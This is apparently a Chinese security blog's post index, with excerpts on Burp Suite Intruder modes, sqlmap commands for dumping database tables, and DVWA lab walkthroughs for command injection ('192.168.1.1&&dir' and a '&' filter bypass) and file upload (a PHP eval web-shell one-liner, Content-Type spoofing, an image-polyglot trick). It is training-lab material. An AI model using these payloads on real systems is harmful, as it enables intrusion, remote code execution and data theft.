2020-2-20 myluzh
NOTE
1. Sniper(狙击手)
顾名思义,就是一个一个的来,就跟98K一样,一ju一个准。也是最基础的一种模式。
添加了一个参数的话,并且假设payload有500个的话,那就执行500次,如果添加了两个参数的话,就会挨着来,第一个参数开始爆破时,第二个不变,如此这样,会进行500+500此 总共1000次爆破。
2. Battering ram(攻城锤)
顾名思义,和狙击手差不多,一个参数的话都一样,只不过如果添加了两个参数的话,就一起进行爆破。那么两个参数爆破时候的值肯定就是一样的了。那么就只会进行500次爆破。
3. Pitchfork(草叉模式)
此模式下如果只添加了一个参数的话,会报错,添加了两个参数的话 ,要求添加两个payload
payload1:1,2
payload2:3,4
那么第一爆破为 1,3
而二次爆破为2,4
如果两个payload行数不一致的话,取最小值进行测试。所以爆破的次数取两个中最小的为准。
4. Cluster bomb(集束炸弹)
同pitchfork,起码两个参数,但此操作会计算两个的payload 的笛卡儿积。
比如payload1:1,2,3
payload2:4,5,6
...
阅读全文>>
评论(0)
(840)
2020-2-1 myluzh
NOTE
sqlmap -u "url" --dbs
跑数据库
sqlmap -u "url" --tables
跑数据表
sqlmap -u "url" --columns -T "表名"
跑出表字段
sqlmap -u "url" --dump -T "表名" -C "需要跑的字段"
跑字段里面内容
-r 指定文件
-u 指定url
-D 指定数据库
-T 指定表
-C 指定字段
--batch 不会询问你输入 全部默认确定
阅读全文>>
标签: sqlmap
评论(0)
(1353)
2020-1-1 myluzh
NOTE
关于命令连接符介绍:
command1 && command2 先执行command1后执行command2
command1 | command2 只执行command2
command1 & command2 先执行command2后执行command1
以上三种连接符在windows和linux环境下都支持
————————————————
LOW级别:
没有对任何进行过滤直接 192.168.1.1&&dir 成功执行
Medium级别:
再次提交192.168.1.1&&dir提示:“Ping 请求找不到主机 192.168.1.1dir。请检查该名称,然后重试。”
也就是我们的“&&”符号被过滤掉了,那就试试单个符号&,192.168.1.1&dir,成功执行
下面是部分代码:查看代码可以发现,这里只把&&根;替换成空,但是没有过滤掉&
$substitutions = array(
'&&' => '', ...
阅读全文>>
评论(0)
(936)
2020-1-1 myluzh
NOTE
Low级别:
没有对上传文件类型进行任何限制,直接上传一个php,<? eval($REQUEST['a']); ?>
上传成功后,还告知了我们路径,直接拼接起来访问执行个phpinfo试试看。
Medium级别:
我们再上传个php试试看,上传失败提示:Your image was not uploaded. We can only accept JPEG or PNG images.对上传文件进行了限制,只能上传jpeg或者png类型的文件了。直接burp suite拦截,然后选php文件上传,把burp suite拦截下来的数据,Content-Type: application/x-php这一条改成Content-Type: image/jpeg
还有一种方法就是00截断,但是只能php版本小于5.3.4才能实现,这边就不复现了。
High级别:
只能上传一个图片一句话,写一个php一句话保存为1.php,然后选一张小一点的图片保存为1.png
windows使用命令copy 1.png/b+1.php 2.png,然后该目录会生成一个2.pn...
阅读全文>>
评论(0)
(1896)